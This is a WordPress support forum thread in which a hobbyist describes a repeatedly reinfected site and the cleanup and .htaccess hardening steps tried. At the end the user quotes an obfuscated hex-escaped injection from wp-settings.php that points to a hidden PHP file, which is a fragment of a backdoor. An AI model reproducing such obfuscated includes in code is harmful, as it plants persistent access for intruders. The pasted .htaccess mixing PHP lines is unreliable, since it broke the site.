Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.
If youโre unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri, SiteLock and Wordfence are a few.
Well… I think I did all the things in that guide. Only the htaccess things seem new to my untrained eye…
And god, please stop telling me to remain calm. After a week of constant artillery fire, that’s not quite having the effect you’re hoping for ๐
OK. DRINK MUCH COFFEE!!!!! ๐
You may have to burn the site down and rebuild, assuming your database is unhacked. Change the password for your hosting account, just in case that’s been compromised, too. If all else fails, consider hiring one of the companies I mentioned to clean your site. It’s what they do all day long; they’ll be more efficient at it than you.
Do you have legitimate visitors from Russia and Ukraine? If not, you can block those countries’ IPs in CloudFlare, on the Firewall page.
-
This reply was modified 9 years ago by
aCstudent.
Sadly, I cannot afford those companies. It’s a hobby thing. But one which I’ve spent blood sweat and tears on for the last 15 years…
This morning, something new. A 403…
I don’t usually have legit visitors from those countries. Good idea to block them entirely…
ok… I am really confused.
I had to restore the files to the state they were in before I changed the prefix to my tables. My host helpdesk tells me the prefix is in the wp-config, but there it still lists the old prefix…
how can this be? Shouldn’t this cause a conflict? I mean, the file tells to look to table prefix A, but this doesn’t exist anymore.
I’ve changed it into the prefix which it should have, and the site seems to work (also after purging the cloudflare cache).
So…. what else did I do?
Well, i did change the .htaccess yesterday, putting this in (source):
WP-Content/Uploads
The uploads directory is the one directory that will almost need to be writable by the web server. It’s where all files are uploaded remotely. You want to prevent PHP execution in this directory, you can do this by placing an .htaccess at the root of /UPLOADS using:
# Kill PHP Execution
<Files *.php>
deny from all
</Files>
Note: This can break your theme if it requires PHP execution in UPLOADS. If you apply it and the site breaks, remove it and the site will reappear.
WP-Config.php
If you use a server with .htaccess, you can put this in that file (at the very top) to deny access to anyone surfing for it:
<files wp-config.php>
order allow,deny
deny from all
</files>
Disable File Editing
It is recommended to disable file editing within the WordPress dashboard. WordPress has a constant that disabled this editing via the wp-config.php file. Append the following two lines to the end of your wp-config file:
## Disable Editing in Dashboard
define(‘DISALLOW_FILE_EDIT’, true);
I copy pasted both into my htaccess, directly following the standard bits. Can this be cause for problems?
-
This reply was modified 9 years ago by
Jeroenla. Reason: extra info
Also: how do I block countries entirely?
dafuq…now the site is gone again…
I get the setup page!
Edit:
ok, site went down again. I had to restore the backup. In the current version, wp-admin is still moved, but the prefix remains…odd…
And the saga continues. Every day, my index.php gets some script injected, along with wp-settings and…uh… another one.
I’ve changed the rights for wp-settings to 400, and index as well.
I’ve changed password to the admin user
I’ve changed ftp password
I’ve changed cPanel password
I’ve changed them again
I’ve moved wp-admin (using iThemes security)
I’ve changed the prefix
I’ve run a AVG scan on my desktop
I’ve run a Malwarebytes scan on my desktop
I’ve run an S&D Spybot scan on my desktop
I’ve sacrificed three virgins at a stake of burning oakwood at full moon…..
I’ve gone through my files, and removed a bunch of old (legacy) stuff, including my old Joomla installation.
Anything else?
(PS: No, I cannot hire a pro. I just don’t have that kind of money and this is just a hobby. Please, don’t suggest it, and don’t tell me I should chose wisely. If there is no money, there is nothing to chose.)
Are you using WordPress 4.7.2?
Have you talked to your hosting provider?
Iโve gone through my files, and removed a bunch of old (legacy) stuff, including my old Joomla installation.
hmmm…. that could be a vector
…vector…? Does that mean “something which could cause the problem”?
I am indeed on 4.7.2. I’ve spoken to the host. Nothing that can be done. Also noteworthy… I have other WP sites with them. Not all are affected.
I have also gone to change my .htaccess as described here: https://codex.wordpress.org/Hardening_WordPress
And for most of the suggestions, I understand what they do, but what does this mean:
WP-Config.php
If you use a server with .htaccess, you can put this in that file (at the very top) to deny access to anyone surfing for it:
<files wp-config.php>
order allow,deny
deny from all
</files>
(Cross my fingers that the site still works once I upload the changed htaccess….
-
This reply was modified 9 years ago by Jeroenla.
Your wp-config.php file is not visible/useful from the front end, regardless of that stuff in .htaccess.
It’s clear your site is compromised. You need to rigorously replace files per the guide in the “remain calm” message above.
Edit: changing the htaccess killed the site. I put the following behind the content which was already in it:
# Block the include-only files.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>
# BEGIN WordPress
# Kill PHP Execution
<Files *.php>
deny from all
</Files>
## Disable Editing in Dashboard
define('DISALLOW_FILE_EDIT', true);
Ok..
so I need to download the WordPress version corresponding to my version and then just overwrite the /wp-admin and the /wp-includes section.
I can understand how to do this. But what I don’t understand is how it works. I mean… WordFence checks the files on my server against the files in the repository. And if it finds a difference, it allows me to fix it with one click of the button.
So..if it doesn’t find any difference, it means the files are equal to the original, right? So how can it be infected then?
Logically (or at least, to me it’s logical) this would imply the compromisation (is that a word) lies elsewhere. But where?
index.php
header.php
footer.php
function.php
All seem like proper code (not a coder, but over the week I’ve learned to quickly recognize the infections), so those seem to not be the problem. Still, this morning, my wp-config was, once again, injected with a script.
This leads to stuff like this (from wp-settings)
Most of WP is loaded at this stage, and the user is authent*/"\x2fhom\x65/je\x72oej\x6d181\x2fdom\x61ins\x2ffin\x61nci\x65ler\x65ddi\x6egsb\x6fei.\x6el/p\x75bli\x63_ht\x6dl/c\x6fmmu\x6eity\x2dtev\x65rwi\x6ader\x65nna\x31maa\x72t20\x317/w\x70-ad\x6din/\x62log\x2ephp";/*icated. WP continues
* to load on the {@see 'init'}
